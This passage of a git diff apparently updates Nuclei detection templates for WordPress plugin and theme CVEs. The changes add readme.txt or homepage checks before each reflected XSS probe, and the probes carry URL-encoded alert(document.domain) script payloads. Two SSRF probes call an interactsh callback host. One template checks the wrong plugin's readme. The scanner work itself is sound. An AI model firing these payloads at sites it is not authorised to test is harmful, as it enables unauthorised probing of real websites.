http/cves/2020/CVE-2020-36510.yaml | 13 +++++++++++++ http/cves/2020/CVE-2020-7107.yaml | 15 +++++++++++++++ http/cves/2021/CVE-2021-24214.yaml | 13 +++++++++++++ http/cves/2021/CVE-2021-24239.yaml | 15 +++++++++++++++ http/cves/2021/CVE-2021-24245.yaml | 15 +++++++++++++++ http/cves/2021/CVE-2021-24298.yaml | 13 +++++++++++++ http/cves/2021/CVE-2021-24320.yaml | 16 ++++++++++++++++ http/cves/2021/CVE-2021-24335.yaml | 15 +++++++++++++++ http/cves/2021/CVE-2021-24342.yaml | 15 +++++++++++++++ http/cves/2021/CVE-2021-24364.yaml | 15 +++++++++++++++ http/cves/2021/CVE-2021-24387.yaml | 3 --- http/cves/2021/CVE-2021-24407.yaml | 17 +++++++++++++++-- http/cves/2021/CVE-2021-24495.yaml | 5 +++++ http/cves/2021/CVE-2021-24891.yaml | 13 +++++++++++++ http/cves/2022/CVE-2022-0381.yaml | 15 +++++++++++++++ http/cves/2022/CVE-2022-1724.yaml | 15 +++++++++++++++ http/cves/2022/CVE-2022-2383.yaml | 15 +++++++++++++++ http/cves/2022/CVE-2022-2462.yaml | 2 +- http/cves/2023/CVE-2023-0602.yaml | 2 +- .../wordpress/ldap-wp-login-xss.yaml | 2 +- .../wordpress/wordpress-wordfence-xss.yaml | 13 +++++++++++++ .../wordpress/wordpress-zebra-form-xss.yaml | 15 +++++++++++++++ .../wordpress/wp-ambience-xss.yaml | 12 ++++++++++++ .../wordpress/wp-custom-tables-xss.yaml | 15 +++++++++++++++ .../wordpress/wp-finder-xss.yaml | 13 +++++++++++++ .../wordpress/wp-flagem-xss.yaml | 13 +++++++++++++ .../vulnerabilities/wordpress/wp-knews-xss.yaml | 13 +++++++++++++ .../wordpress/wp-nextgen-xss.yaml | 13 +++++++++++++ .../wordpress/wp-phpfreechat-xss.yaml | 13 +++++++++++++ .../wordpress/wp-qwiz-online-xss.yaml | 2 +- .../wordpress/wp-securimage-xss.yaml | 15 +++++++++++++++ .../wordpress/wp-slideshow-xss.yaml | 15 +++++++++++++++ 67 files changed, 865 insertions(+), 11 deletions(-) diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index 2a8f576b92a..c6533cbe467 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -31,7 +31,20 @@ info: google-query: inurl:"/wp-content/plugins/defa-online-image-protector" tags: cve2016,cve,wordpress,xss,wp-plugin,defa-online-image-protector_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/defa-online-image-protector/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Defa Online Image Protector' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index 0b82cdc5ae0..845777a3768 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -29,7 +29,23 @@ info: google-query: inurl:"/wp-content/plugins/e-search" tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/e-search/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Search' + - 'Tags:' + - 'Tested up to:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index dbf5a6f29ce..d435a94408e 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -30,7 +30,23 @@ info: google-query: inurl:"/wp-content/plugins/e-search" tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/e-search/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Search' + - 'Tags:' + - 'Tested up to:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index 8c37974d95d..030796f7fa8 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -31,7 +31,20 @@ info: google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary" tags: cve2016,cve,wordpress,xss,wp-plugin,cminds +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/enhanced-tooltipglossary/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'CM Tooltip Glossary' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported" diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index 8a4ca435c49..be645f8640d 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -30,7 +30,20 @@ info: google-query: inurl:"/wp-content/plugins/forget-about-shortcode-buttons" tags: cve2016,cve,wordpress,xss,wp-plugin,designsandcode +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/forget-about-shortcode-buttons/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Forget About Shortcode Buttons =' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index d7fa32d3c84..b2d50b37903 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -30,7 +30,20 @@ info: google-query: inurl:"/wp-content/plugins/hdw-tube" tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'HDW WordPress Video Gallery' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index a56972e594a..5316405f783 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -30,7 +30,20 @@ info: google-query: inurl:"/wp-content/plugins/hdw-tube" tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'HDW WordPress Video Gallery' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index eff4328c1bb..6c71027dbc6 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -30,7 +30,20 @@ info: framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,maps,hero-maps-pro_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/hero-maps-pro/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Hero Maps Pro =' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 7a162c2fc62..a4980b959a6 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -30,7 +30,19 @@ info: google-query: inurl:"/wp-content/plugins/indexisto" tags: cve,cve2016,wordpress,xss,wp-plugin,indexisto_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1 + Host: {{Hostname}} + matchers: + - type: word + internal: true + words: + - '= Indexisto' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index 948c74273a5..3160d5cc977 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml @@ -30,7 +30,20 @@ info: framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,new-year-firework_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/new-year-firework/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'New Year Firework =' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index 25fe9f167aa..ddb8e7f587c 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -29,7 +29,20 @@ info: google-query: inurl:"/wp-content/plugins/page-layout-builder" tags: cve,cve2016,wordpress,xss,wp-plugin,page-layout-builder_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/page-layout-builder/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Page Layout Builder =' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index 93cf7c25239..8dac9e6d268 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,parsi-font_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/parsi-font/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'WP-Parsi Admin Font Editor' + - 'MW Font Changer' + condition: or + - method: GET path: - "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index b8238c16d42..e7558448781 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2016,cve,wordpress,wp-plugin,xss,photoxhibit_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/photoxhibit/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'PhotoXhibit' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index 682d38d9b64..fc14123db4c 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -28,7 +28,19 @@ info: framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,mail,pondol-formmail_project +flow: http(1) && http(2) + http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/pondol-formmail/' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index 4645bea64a3..9196d0015c8 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -30,7 +30,20 @@ info: framework: wordpress tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,s3-video_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/s3-video/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'S3 Video Plugin =' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22" diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index aa79851c168..f9e6ee52751 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,simpel-reserveren_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/simpel-reserveren/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Simpel Reserveren' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index 18cdc95c771..71d2e2a0b0e 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml @@ -28,7 +28,20 @@ info: framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-form_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/tidio-form/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Easy Contact Form Builder =' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index f503872328b..cc4db53cff6 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-gallery_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/tidio-gallery/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Tidio Gallery' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index 15dbf0ad572..1f8cdee6f55 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -29,7 +29,22 @@ info: framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,browserweb +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/whizz/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'WHIZZ' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index 72f756ade00..16482ff2e4b 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -28,7 +28,20 @@ info: framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,wpsolr +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/wpsolr-search-engine/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'WPSOLR Search Engine =' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 2afe54206ad..a52c4e1782a 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -4,7 +4,8 @@ info: name: ScoreMe Theme - Cross-Site Scripting author: daffainfo severity: medium - description: WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + description: | + WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | @@ -30,7 +31,20 @@ info: framework: wordpress tags: cve2016,cve,wordpress,wp-theme,xss,scoreme_project +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/themes/scoreme/style' + - method: GET path: - "{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 2a20b7fcd1b..7354155c415 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -30,7 +30,19 @@ info: framework: wordpress tags: cve,cve2017,xss,wp-plugin,packetstorm,wordpress,zitec +flow: http(1) && http(2) + http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/emag-marketplace-connector/' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 3bd36405ef7..8ae41e17000 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -28,7 +28,23 @@ info: framework: wordpress tags: cve2017,cve,xss,wp-plugin,packetstorm,wordpress,amtythumb_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Amty Thumb' + - 'Tags:' + condition: and + case-insensitive: true + - method: POST path: - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1" diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 0d194271e33..8dc0b1a0b3c 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -30,7 +30,20 @@ info: framework: wordpress tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm,wpmailster +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/wp-mailster/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'WP Mailster =' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 9e6304924ad..a8b32fb92cc 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -30,7 +30,20 @@ info: framework: wordpress tags: cve2017,cve,wp-plugin,oast,wpscan,wordpress,ssrf,xss,designmodo +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/qards/' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}' diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 3b22c0da553..80963a171b5 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2017,cve,wordpress,xss,wp-plugin,raygun +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/raygun4wp/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Raygun4WP' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml index b9251f9f59e..bd2a66ed47f 100644 --- a/http/cves/2018/CVE-2018-20462.yaml +++ b/http/cves/2018/CVE-2018-20462.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2018,cve,wordpress,xss,wp-plugin,jsmol2wp_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/jsmol2wp/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'JSmol2WP' + - 'Tags:' + condition: and + - method: GET path: - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8' diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml index 09eae3c7a58..5eb2843993c 100644 --- a/http/cves/2019/CVE-2019-14470.yaml +++ b/http/cves/2019/CVE-2019-14470.yaml @@ -29,7 +29,20 @@ info: product: instagram-php-api tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,packetstorm,instagram-php-api_project +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/userpro/' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E' diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml index cf985fcdd2f..7527b21aade 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml @@ -28,7 +28,22 @@ info: framework: wordpress tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,my_calendar_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'My Calendar' + - 'Tags:' + condition: and + - method: GET path: - '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml index 59b4f484ec3..a534eab2a91 100644 --- a/http/cves/2019/CVE-2019-15889.yaml +++ b/http/cves/2019/CVE-2019-15889.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve,cve2019,packetstorm,wordpress,xss,wp-plugin,wpdownloadmanager +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/download-manager/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Download Manager' + - 'License:' + condition: and + - method: GET path: - '{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc' diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml index f291a1d94e0..11534d13252 100644 --- a/http/cves/2019/CVE-2019-16332.yaml +++ b/http/cves/2019/CVE-2019-16332.yaml @@ -30,7 +30,20 @@ info: framework: wordpress tags: cve,cve2019,packetstorm,wordpress,xss,wp-plugin,auth,api_bearer_auth_project +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/api-bearer-auth/' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml index d6f1527190c..4a815b9273b 100644 --- a/http/cves/2019/CVE-2019-16525.yaml +++ b/http/cves/2019/CVE-2019-16525.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve,cve2019,xss,wp-plugin,packetstorm,wordpress,checklist +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/checklist/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Checklist' + - 'Tags:' + condition: and + - method: GET path: - '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2019/CVE-2019-16932.yaml b/http/cves/2019/CVE-2019-16932.yaml index 096839afa5c..d634019074c 100644 --- a/http/cves/2019/CVE-2019-16932.yaml +++ b/http/cves/2019/CVE-2019-16932.yaml @@ -29,9 +29,24 @@ info: vendor: themeisle product: visualizer framework: wordpress - tags: cve,cve2019,wp-plugin,ssrf,wordpress,xss,unauth,wpscan,intrusive,themeisle + tags: cve,cve2019,wp-plugin,ssrf,wordpress,oast,unauth,wpscan,intrusive,themeisle + +flow: http(1) && http(2) http: + - raw: + - | + GET /wp-content/plugins/visualizer/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Visualizer' + - 'Tested up to:' + condition: and + - method: POST path: - "{{BaseURL}}/wp-json/visualizer/v1/upload-data" diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml index e3382d9c620..5ba0faf23a8 100644 --- a/http/cves/2020/CVE-2020-26153.yaml +++ b/http/cves/2020/CVE-2020-26153.yaml @@ -29,7 +29,22 @@ info: framework: wordpress tags: cve2020,cve,xss,wordpress,wp-plugin,eventespresso +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/event-espresso-core-reg/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Event Espresso' + - 'Tested up to:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb" diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index dd63e3b16a0..d43ca5a6998 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -30,7 +30,20 @@ info: framework: 